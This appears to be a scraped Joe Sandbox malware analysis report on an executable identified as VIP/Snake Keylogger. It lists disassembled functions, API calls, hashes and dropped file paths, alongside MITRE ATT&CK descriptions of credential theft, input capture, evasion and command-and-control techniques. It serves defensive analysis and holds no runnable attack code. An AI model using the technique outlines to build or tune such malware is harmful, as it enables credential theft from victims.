Function 003F8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 003F8DEE

Strings

ListBox, xrefs: 003F8DBA
ComboBox, xrefs: 003F8D8F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 23cb9d035941013142c4833efd2e98b707c37a37fbe34d7c995fcfbcecb84854
Instruction ID: 88b69db039bd84b6476ab8eacbda5c32b13b88bc2f3747d3abece7a059bdbc00
Opcode Fuzzy Hash: 23cb9d035941013142c4833efd2e98b707c37a37fbe34d7c995fcfbcecb84854
Instruction Fuzzy Hash: B201A2B1A4510DA7DF16EBA4C992EFF77ACDF16300F50002AB905AB292DE258E0DD275

Function 003FC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003FC534

Part of subcall function 003FC816: _memmove.LIBCMT ref: 003FC860
Part of subcall function 003FC816: VariantInit.OLEAUT32(00000000), ref: 003FC882
Part of subcall function 003FC816: VariantCopy.OLEAUT32(00000000,?), ref: 003FC88C

VariantClear.OLEAUT32(?), ref: 003FC556

Strings

d}E, xrefs: 003FC517

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}E
API String ID: 2932060187-750258250
Opcode ID: 094adb186fe14509a026b9eaf75e916dbf569cbb08b63186e065c1b9d959b42d
Instruction ID: 5f59e697362d16e158eb1248b91e0899e914ebce61baa28451c6c963cac0fb11
Opcode Fuzzy Hash: 094adb186fe14509a026b9eaf75e916dbf569cbb08b63186e065c1b9d959b42d
Instruction Fuzzy Hash: 5C113C719007089FC720DFAAD88489AF7F8FF18310B50863FE58AD7611E771AA49CB94

Function 00404F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00404F46
_wcscmp.LIBCMT ref: 00404F58

Strings

#32770, xrefs: 00404F52

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 70e255fa94c62b1a7c310fea7060e7285331d56dc25ac1579ab819c9efaa0dae
Instruction ID: b306cbe809230322ac96e5e911e0c6c79c1b6858c348da3b5e9a2d81c5300e19
Opcode Fuzzy Hash: 70e255fa94c62b1a7c310fea7060e7285331d56dc25ac1579ab819c9efaa0dae
Instruction Fuzzy Hash: BEE09B3260022936D7209655AC45FA7F7ACDB85B61F01007BFD04D6151E9609A4587D5

Function 003DB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003DB314: _memset.LIBCMT ref: 003DB321

Part of subcall function 003C0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003DB2F0,?,?,?,003A100A), ref: 003C0945

IsDebuggerPresent.KERNEL32(?,?,?,003A100A), ref: 003DB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003A100A), ref: 003DB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003DB2FE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: f1ee5e535476eac10798ca2ec42222a8108c733e4d747d89afd95e8be1006f13
Instruction ID: 85271b967079c28d737faeac83a3d567f52c4063f4ad58400ca406f11104a5db
Opcode Fuzzy Hash: f1ee5e535476eac10798ca2ec42222a8108c733e4d747d89afd95e8be1006f13
Instruction Fuzzy Hash: BEE06D75200740CBE722DF28E504742BAE4AF00744F51897EE486C7350E7B4D409CBA1

Function 003F7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003F7C82

Part of subcall function 003C3358: _doexit.LIBCMT ref: 003C3362

Strings

AutoIt, xrefs: 003F7C76
Error allocating memory., xrefs: 003F7C7B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: edafb3b8bd85090023beb8e148862dabedbc2871786b1d2d4442fac82e617965
Instruction ID: a81d4f1ad9ce2abe2720ea5a9ae0fd885216d09ec0038aaae710d7d36cd12cb6
Opcode Fuzzy Hash: edafb3b8bd85090023beb8e148862dabedbc2871786b1d2d4442fac82e617965
Instruction Fuzzy Hash: B0D012323C435836D11632A9AC06FDA65488F05B52F144426BF089D5D349D5599152A9

Function 003E1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 003E1775

Part of subcall function 0041BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003E195E,?), ref: 0041BFFE
Part of subcall function 0041BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0041C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003E196D

Strings

WIN_XPe, xrefs: 003E1788

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 671baf25b48f1c65b5b129a7b6568afb2dbdd873e486b5d140e5409f154fa20a
Instruction ID: 4ef3d792ed11485b566a0f9be97150d101203e1ecbf6cfdb7c88d24e57c28d63
Opcode Fuzzy Hash: 671baf25b48f1c65b5b129a7b6568afb2dbdd873e486b5d140e5409f154fa20a
Instruction Fuzzy Hash: 2EF06D71800058DFCB26DB92C984AECBBFCBB08701F9400A9E002A24A0D7704F85CF68

Function 00425964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0042596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00425981

Part of subcall function 00405244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052BC

Strings

Shell_TrayWnd, xrefs: 00425967

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e7d477f6b04f4902af3a63e94a73b420b07b48f5bb6df7bc495240078ca60853
Instruction ID: bd4af06dcd513c098377f1c0a3673433ac33cc1ab7e68a99248333d494fcf025
Opcode Fuzzy Hash: e7d477f6b04f4902af3a63e94a73b420b07b48f5bb6df7bc495240078ca60853
Instruction Fuzzy Hash: 47D0C931384311B6E674BB709C0BF976A24EF00B55F50083AB649AA1D1D9F49805CA5C

Function 00425998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004259AE
PostMessageW.USER32(00000000), ref: 004259B5

Part of subcall function 00405244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052BC

Strings

Shell_TrayWnd, xrefs: 004259A7

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b0492c941a2b288a7e08bb3cdf7056eaf2da4309488b84c6418c779517673bfe
Instruction ID: 57daeae887794b1155fef5cee6d53509232e975db75c55fe26ce6c8a2e1c134e
Opcode Fuzzy Hash: b0492c941a2b288a7e08bb3cdf7056eaf2da4309488b84c6418c779517673bfe
Instruction Fuzzy Hash: FBD0C9313803117AE674BB709C0BF976624EF04B55F90083AB645AA1D1D9F4A805CA5C

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report n0nsAzvYNd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Dalis

C:\Users\user\AppData\Local\Temp\autD95C.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
n0nsAzvYNd.exe

Function 003A3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 003A49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 003A4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00409155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 003A3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Function 003A3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 003A708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 003A3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 003A3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 003A3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 003AF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 0100F440 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 003A39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0100F230 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
fileCOMMON

Function 003A407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
